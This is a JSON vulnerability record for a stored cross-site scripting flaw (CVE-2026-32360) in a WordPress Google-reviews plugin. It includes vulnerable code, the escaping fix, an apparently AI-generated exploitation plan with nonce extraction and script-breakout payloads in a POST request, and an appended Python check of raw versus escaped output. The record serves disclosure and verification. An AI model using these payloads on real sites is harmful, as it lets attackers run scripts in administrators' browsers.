[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f-fb5KkFrH1VO-H4mYHdKOStvUyN8RGXoyuuT35_JVbQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-32360","rich-showcase-for-google-reviews-authenticated-editor-stored-cross-site-scripting","Rich Showcase for Google Reviews \u003C= 6.9.4.3 - Authenticated (Editor+) Stored Cross-Site Scripting","The Rich Showcase for Google Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 6.9.4.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 
This only affects multi-site installations and installations where unfiltered_html has been disabled.","widget-google-reviews",null,"\u003C=6.9.4.3","6.9.4.4","medium",4.4,"CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:H\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-15 00:00:00","2026-04-15 21:05:32",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fce75f50d-a9d9-4e4e-85b2-6e15ffa77a94?source=api-prod",60,[22,23,24,25,26,27,28,29],"assets\u002Fcss\u002Fpublic-main-rtl.css","assets\u002Fcss\u002Fpublic-main.css","assets\u002Fjs\u002Fadmin-main.js","assets\u002Fjs\u002Fpublic-main.js","assets\u002Fsrc\u002Fjs\u002Fadmin-builder.js","grw.php","includes\u002Fclass-builder-page.php","includes\u002Fclass-view.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-32360\n\n## 1. Vulnerability Summary\nThe **Rich Showcase for Google Reviews** plugin (version \u003C= 6.9.4.3) is vulnerable to **Authenticated (Editor+) Stored Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin fails to sanitize or escape feed configuration data (specifically the title and content fields) before rendering them in the administrative \"Builder\" interface.\n\nOn a standard single-site WordPress install, Editors hold the `unfiltered_html` capability and may legitimately save script, so no privilege boundary is crossed there. On **Multi-site**, or where `unfiltered_html` has been disabled, Editors are not supposed to be able to persist script; because the plugin stores the submitted title and content and echoes them into the Builder page without escaping, an Editor can still store arbitrary JavaScript that fires when an Administrator opens the Builder page.\n\n## 2. 
Attack Vector Analysis\n- **Vulnerable Admin Page**: `wp-admin\u002Fadmin.php?page=grw-builder`\n- **Vulnerable Form Action**: `admin-post.php?action=grw_feed_save`\n- **Vulnerable Parameters**: \n    - `grw_feed[title]`\n    - `grw_feed[content]`\n- **Authentication Level**: Editor or higher.\n- **Preconditions**: Multi-site installation or `unfiltered_html` disabled (e.g., `define('DISALLOW_UNFILTERED_HTML', true);`).\n\n## 3. Code Flow\n1. **Input**: An Editor submits the \"Connect Reviews\" form in the Builder.\n2. **Persistence**: The form maps to `admin-post.php?action=grw_feed_save`. The plugin (via its `Feed_Controller`, inferred from the `Post_Types::FEED_POST_TYPE . '_save'` action) saves the `grw_feed[title]` and `grw_feed[content]` into a custom post type (likely `grw_feed`).\n3. **Retrieval**: When the Builder page is loaded (`includes\u002Fclass-builder-page.php`), the `render()` function retrieves the feed object:\n   ```php\n   $feed_post_title = $feed->post_title;\n   $feed_content = trim($feed->post_content);\n   ```\n4. **Sink (Title)**: The `post_title` is echoed raw into an `input` value attribute:\n   ```php\n   \u002F\u002F includes\u002Fclass-builder-page.php:97\n   \u003Cinput id=\"grw_title\" ... value=\"\u003C?php if (isset($feed_post_title)) { echo $feed_post_title; } ?>\" ...>\n   ```\n5. **Sink (Content)**: The `post_content` is echoed raw into a `textarea`:\n   ```php\n   \u002F\u002F includes\u002Fclass-builder-page.php:112\n   \u003Ctextarea id=\"grw-builder-connection\" ...>\u003C?php echo $feed_content; ?>\u003C\u002Ftextarea>\n   ```\n\n## 4. Nonce Acquisition Strategy\nThe form uses a WordPress nonce for protection, registered with the action `grw_wpnonce`.\n\n1. **Shortcode\u002FPage**: The Builder page `wp-admin\u002Fadmin.php?page=grw-builder` contains the nonce.\n2. 
**Extraction**:\n   - Navigate to `wp-admin\u002Fadmin.php?page=grw-builder` as an Editor.\n   - Use `browser_eval` to extract the nonce from the hidden input field:\n     ```javascript\n     document.querySelector('input[name=\"grw_nonce\"]').value\n     ```\n\n## 5. Exploitation Strategy\n### Step 1: Identify Post Type Slug\nConfirm that `Post_Types::FEED_POST_TYPE` is `grw_feed`. (Inferred from parameter names in `class-builder-page.php`).\n\n### Step 2: Extract Nonce\n- Login as Editor.\n- Navigate to `wp-admin\u002Fadmin.php?page=grw-builder`.\n- Execute `browser_eval` to get the value of `grw_nonce`.\n\n### Step 3: Inject Payload via POST\nSend a POST request to `admin-post.php` to save a new feed configuration with the payload.\n\n- **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-post.php?action=grw_feed_save`\n- **Method**: `POST`\n- **Content-Type**: `application\u002Fx-www-form-urlencoded`\n- **Parameters**:\n    - `grw_nonce`: `[EXTRACTED_NONCE]`\n    - `grw_feed[post_id]`: (empty for new)\n    - `grw_feed[title]`: `\">\u003Cscript>alert(\"XSS_TITLE\")\u003C\u002Fscript>`\n    - `grw_feed[content]`: `\u003C\u002Ftextarea>\u003Cscript>alert(\"XSS_CONTENT\")\u003C\u002Fscript>`\n    - `grw_feed[current_url]`: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=grw-builder`\n\n### Step 4: Trigger Execution\nThe plugin will redirect to the Builder page for the newly created ID (e.g., `?page=grw-builder&grw_feed_id=123`).\n- Follow the redirect or manually navigate to the new ID.\n- The browser should trigger two alerts: one from the title attribute breakout and one from the textarea breakout.\n\n## 6. Test Data Setup\n1. **User**: Create a user with the `Editor` role.\n2. **Environment Restriction**: Ensure the test environment has `unfiltered_html` disabled to prove the vulnerability bypasses expected security controls:\n   ```bash\n   wp config set DISALLOW_UNFILTERED_HTML true --raw\n   ```\n3. 
**Plugin Activation**: Ensure \"Rich Showcase for Google Reviews\" is active.\n\n## 7. Expected Results\n- The POST request should return a `302 Redirect`.\n- The redirection URL should contain a `grw_feed_id` parameter.\n- Upon loading the redirect URL, the HTML source should contain:\n  ```html\n  \u003Cinput id=\"grw_title\" ... value=\"\">\u003Cscript>alert(\"XSS_TITLE\")\u003C\u002Fscript>\">\n  ...\n  \u003Ctextarea ...>\u003C\u002Ftextarea>\u003Cscript>alert(\"XSS_CONTENT\")\u003C\u002Fscript>\u003C\u002Ftextarea>\n  ```\n- JavaScript execution (`alert`) occurs in the context of the logged-in user.\n\n## 8. Verification Steps\n1. **Database Check**: Verify the payload is stored in the `wp_posts` table for the `grw_feed` post type:\n   ```bash\n   wp post list --post_type=grw_feed --fields=ID,post_title,post_content\n   ```\n2. **Visual Check**: Use `browser_navigate` to the feed URL and confirm the alert appears.\n\n## 9. Alternative Approaches\nIf the `admin-post.php` handler restricts creation to specific roles or requires an existing `post_id`, first create a \"Feed\" legitimately via the UI, then capture the `post_id` and perform the update via the same POST endpoint using the legitimate ID.\n\nIf the Editor cannot access the Builder page due to additional capability checks, verify if the `grw_rateus_ajax_feedback` action (found in `assets\u002Fjs\u002Fadmin-main.js`) also stores data unsafely, although that is a different endpoint.","The Rich Showcase for Google Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'grw_feed' title and content parameters. 
Authenticated attackers with editor-level permissions can inject arbitrary scripts into these fields, which execute when an administrator visits the plugin's builder interface, particularly in environments where unfiltered_html is disabled.","\u002F\u002F includes\u002Fclass-builder-page.php line 97\n\u003Cinput id=\"grw_title\" class=\"grw-toolbar-title-input\" type=\"text\" name=\"\u003C?php echo Post_Types::FEED_POST_TYPE; ?>[title]\" value=\"\u003C?php if (isset($feed_post_title)) { echo $feed_post_title; } ?>\" placeholder=\"Enter a widget name\" maxlength=\"255\" autofocus>\n\n---\n\n\u002F\u002F includes\u002Fclass-builder-page.php line 112\n\u003Ctextarea id=\"grw-builder-connection\" name=\"\u003C?php echo Post_Types::FEED_POST_TYPE; ?>[content]\" style=\"display:none\">\u003C?php echo $feed_content; ?>\u003C\u002Ftextarea>","--- includes\u002Fclass-builder-page.php\n+++ includes\u002Fclass-builder-page.php\n@@ -94,7 +94,7 @@\n                 \u003Cdiv class=\"grw-builder-workspace\">\n                     \u003Cdiv class=\"grw-toolbar\">\n                         \u003Cdiv class=\"grw-toolbar-title\">\n-                            \u003Cinput id=\"grw_title\" class=\"grw-toolbar-title-input\" type=\"text\" name=\"\u003C?php echo Post_Types::FEED_POST_TYPE; ?>[title]\" value=\"\u003C?php if (isset($feed_post_title)) { echo $feed_post_title; } ?>\" placeholder=\"Enter a widget name\" maxlength=\"255\" autofocus>\n+                            \u003Cinput id=\"grw_title\" class=\"grw-toolbar-title-input\" type=\"text\" name=\"\u003C?php echo Post_Types::FEED_POST_TYPE; ?>[title]\" value=\"\u003C?php if (isset($feed_post_title)) { echo esc_attr($feed_post_title); } ?>\" placeholder=\"Enter a widget name\" maxlength=\"255\" autofocus>\n                         \u003C\u002Fdiv>\n                         \u003Cdiv class=\"grw-toolbar-control\">\n                             \u003C?php if ($feed_inited) {\n@@ -109,7 +109,7 @@\n                         
\u003C\u002Fdiv>\n                     \u003C\u002Fdiv>\n                     \u003Cdiv class=\"grw-builder-preview\">\n-                        \u003Ctextarea id=\"grw-builder-connection\" name=\"\u003C?php echo Post_Types::FEED_POST_TYPE; ?>[content]\" style=\"display:none\">\u003C?php echo $feed_content; ?>\u003C\u002Ftextarea>\n+                        \u003Ctextarea id=\"grw-builder-connection\" name=\"\u003C?php echo Post_Types::FEED_POST_TYPE; ?>[content]\" style=\"display:none\">\u003C?php echo esc_textarea($feed_content); ?>\u003C\u002Ftextarea>\n                         \u003Cdiv id=\"grw_collection_preview\">\n                             \u003C?php","1. Gain access to a WordPress account with Editor or higher privileges.\n2. In environments where 'unfiltered_html' is disabled (like WordPress Multi-site), navigate to the 'Connect Reviews' builder page to retrieve a valid 'grw_nonce'.\n3. Construct a POST request to '\u002Fwp-admin\u002Fadmin-post.php?action=grw_feed_save' including the nonce and malicious payloads.\n4. For the title field (grw_feed[title]), use a payload like '\">\u003Cscript>alert(1)\u003C\u002Fscript>' to break out of the input value attribute.\n5. For the content field (grw_feed[content]), use a payload like '\u003C\u002Ftextarea>\u003Cscript>alert(1)\u003C\u002Fscript>' to break out of the textarea element.\n6. 
The scripts will be stored in the database and execute whenever a user (such as an Administrator) loads the feed configuration in the plugin's builder interface.","gemini-3-flash-preview","2026-04-20 22:23:36","2026-04-20 22:24:12",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","6.9.4.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwidget-google-reviews\u002Ftags\u002F6.9.4.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-google-reviews.6.9.4.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwidget-google-reviews\u002Ftags\u002F6.9.4.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-google-reviews.6.9.4.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwidget-google-reviews\u002Ftags"]
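Added example (not code from the page, the plugin or its patch): a Python model of the two Builder-page sinks named in the research plan (the `value` attribute on line 97 and the `textarea` on line 112 of `includes/class-builder-page.php`) rendered once raw, as in 6.9.4.3, and once through approximations of the `esc_attr()` and `esc_textarea()` calls the 6.9.4.4 diff introduces. A tag-counting parser then shows that the plan's two payloads create `<script>` elements in the raw rendering and none in the escaped one. The payload strings are copied from the plan; the `grw_feed` field names follow the plan's inference about the post type slug; the `esc_attr()` approximation reproduces WordPress's no-double-encoding behaviour for existing entities, the `esc_textarea()` approximation is plain `htmlspecialchars()`-style encoding, and neither is the WordPress implementation itself.

```python
import html
import re
from html.parser import HTMLParser

# Constructed inputs modelled on the payloads in the research plan (not captured traffic).
TITLE_PAYLOAD = '"><script>alert("XSS_TITLE")</script>'
CONTENT_PAYLOAD = '</textarea><script>alert("XSS_CONTENT")</script>'

# Matches an already-encoded entity so esc_attr() leaves it alone; WordPress calls
# _wp_specialchars() with double_encode = false for esc_attr(). This is an approximation.
_ENTITY = re.compile(r'&(?:#[0-9]+|#x[0-9A-Fa-f]+|[A-Za-z][A-Za-z0-9]*);')


def esc_attr(value: str) -> str:
    """Approximation of WordPress esc_attr(): encode & < > " ' for an attribute value,
    without re-encoding entities that are already present."""
    out, pos = [], 0
    for m in _ENTITY.finditer(value):
        out.append(html.escape(value[pos:m.start()], quote=True))
        out.append(m.group(0))
        pos = m.end()
    out.append(html.escape(value[pos:], quote=True))
    return ''.join(out)


def esc_textarea(value: str) -> str:
    """Approximation of WordPress esc_textarea(): htmlspecialchars() with ENT_QUOTES.
    It does double-encode, so the browser submits back exactly what was stored."""
    return html.escape(value, quote=True)


def render_builder(title: str, content: str, escaped: bool) -> str:
    """Model of the two sinks in includes/class-builder-page.php (lines 97 and 112).
    escaped=False echoes raw as in <= 6.9.4.3; escaped=True applies the 6.9.4.4 fix.
    The field names assume the feed post type slug is grw_feed, as the plan infers."""
    t = esc_attr(title) if escaped else title
    c = esc_textarea(content) if escaped else content
    return (
        f'<input id="grw_title" type="text" name="grw_feed[title]" value="{t}" maxlength="255">\n'
        f'<textarea id="grw-builder-connection" name="grw_feed[content]" style="display:none">{c}</textarea>'
    )


class _TagCollector(HTMLParser):
    """Records every start tag the parser sees; a <script> that was not in the template
    means a stored value broke out of its attribute or element context."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_script_count(markup: str) -> int:
    """Number of <script> start tags in the rendered fragment (the template has none)."""
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.tags.count('script')


def audit(title: str, content: str) -> dict:
    """Compare the raw echo against the escaped echo for one stored feed."""
    return {
        'vulnerable': injected_script_count(render_builder(title, content, escaped=False)),
        'fixed': injected_script_count(render_builder(title, content, escaped=True)),
    }


if __name__ == '__main__':
    print(audit(TITLE_PAYLOAD, CONTENT_PAYLOAD))  # {'vulnerable': 2, 'fixed': 0}
    print(render_builder(TITLE_PAYLOAD, CONTENT_PAYLOAD, escaped=True))
```

The parser check is the same test a verifier would run against the real page source after the POST in Step 3 of the plan: count `<script>` elements that the template did not emit. Note that `esc_textarea()` is the right call for element text and `esc_attr()` for a quoted attribute; swapping them would still be safe here because both encode the same characters, but attribute context additionally needs the entity-preserving behaviour so that a title such as `Reviews &amp; more` is not turned into `&amp;amp;` on every save and reload.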